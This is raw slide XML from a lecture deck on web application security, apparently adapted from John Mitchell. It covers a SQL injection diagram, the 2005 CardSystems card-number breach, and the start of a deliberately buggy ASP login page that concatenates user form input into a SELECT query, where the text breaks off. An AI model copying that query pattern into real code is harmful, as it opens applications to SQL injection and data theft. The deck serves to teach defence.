          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="-76200"/>
            <a:ext cx="9144000" cy="6858000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="4320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1068035" name="Group 3"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5760" cy="4320"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5760" cy="4320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1068036"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068059"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06809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068094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>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8095"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68096"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5803B63-52E0-420F-95D9-B2621020816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745" r:id="rId12"/>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7620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4099"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A4876DF-757E-41D8-A7F8-C5ABB82774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cvedetails.com/vulnerability-list/vendor_id-2337/opsqli-1/Wordpres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5"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2.xml"/><Relationship Id="rId2"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55.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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55.xml"/><Relationship Id="rId2"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hyperlink" Target="https://www.paypal.com/cgi-bin/webscr?cmd=_home" TargetMode="External"/><Relationship Id="rId3"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2.xml"/><Relationship Id="rId2"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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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38.xml"/><Relationship Id="rId2"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oleObject" Target="../embeddings/oleObject5.bin"/><Relationship Id="rId7"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png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout42.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide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42.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide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4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4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45.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1752600"/>
            <a:ext cx="8153400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Web Application Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="837635" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3810000"/>
            <a:ext cx="7924800" cy="2362200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>* Original slides were prepared by John Mitchell</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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic picture: SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{90AAFDFD-6958-4AC8-BA55-D6DABC5613AF}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696913" y="2667000"/>
            <a:ext cx="1436687" cy="1436688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14341" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6234113" y="4572000"/>
            <a:ext cx="1155700" cy="1420813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14342" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="1905000"/>
            <a:ext cx="2436813" cy="846138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14343" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5789613" y="1524000"/>
            <a:ext cx="168116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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14344" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5805488" y="6000750"/>
            <a:ext cx="181451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SQL DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14345"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a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14346" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="4040188"/>
            <a:ext cx="1114425" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14347" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2562225" y="2070100"/>
            <a:ext cx="2471738" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>post malicious form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14348" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6184901" y="3651250"/>
            <a:ext cx="1801812" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14349" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7277100" y="3482975"/>
            <a:ext cx="1485900" cy="708025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>unintended </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL query</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14350" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3119438" y="3714750"/>
            <a:ext cx="2638425" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>receive valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14351" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2225675" y="2378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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14352" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7207250" y="3090863"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14353" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200"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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14354" name="Freeform 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2152650" y="2773363"/>
            <a:ext cx="4400550" cy="1703387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T1" fmla="*/ 1703387 h 1703387"/>
              <a:gd name="T2" fmla="*/ 3295651 w 4400550"/>
              <a:gd name="T3" fmla="*/ 131762 h 1703387"/>
              <a:gd name="T4" fmla="*/ 0 w 4400550"/>
              <a:gd name="T5" fmla="*/ 912812 h 1703387"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 4400550"/>
              <a:gd name="T10" fmla="*/ 0 h 1703387"/>
              <a:gd name="T11" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T12" fmla="*/ 1703387 h 1703387"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="4400550" h="1703387">
                <a:moveTo>
                  <a:pt x="4400550" y="1703387"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4032250" y="1179512"/>
                  <a:pt x="4029076" y="263524"/>
                  <a:pt x="3295651" y="131762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2562226" y="0"/>
                  <a:pt x="1098550" y="601662"/>
                  <a:pt x="0" y="912812"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>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7B763EB4-AB53-445B-A24A-77B4A4F03C31}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>CardSystems Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1536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dirty="0" err="1" smtClean="0"/>
              <a:t>CardSystems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>credit card payment processing company</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injection attack in June 2005</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>put out of business</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>263,000 credit card #s stolen from database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>credit card #s stored unencrypted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>43 million credit card #s exposed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15365" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000" y="337343"/>
            <a:ext cx="1397000" cy="1611313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">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4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8" t="24610" r="33941" b="16382"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="457201"/>
            <a:ext cx="8686800" cy="566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6290846"/>
            <a:ext cx="7889789" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cvedetails.com/vulnerability-list/vendor_id-2337/opsqli-1/Wordpress.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35815753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11D6FF2-307B-45F8-8CB1-4C00E9065EA9}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1303557" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2133600"/>
            <a:ext cx="228600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1303554" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="228600"/>
            <a:ext cx="8686800" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example:  buggy login page  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>(ASP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1303555" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1295400"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ok = execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>* FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>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WHERE user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>&amp;  form(“user”)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
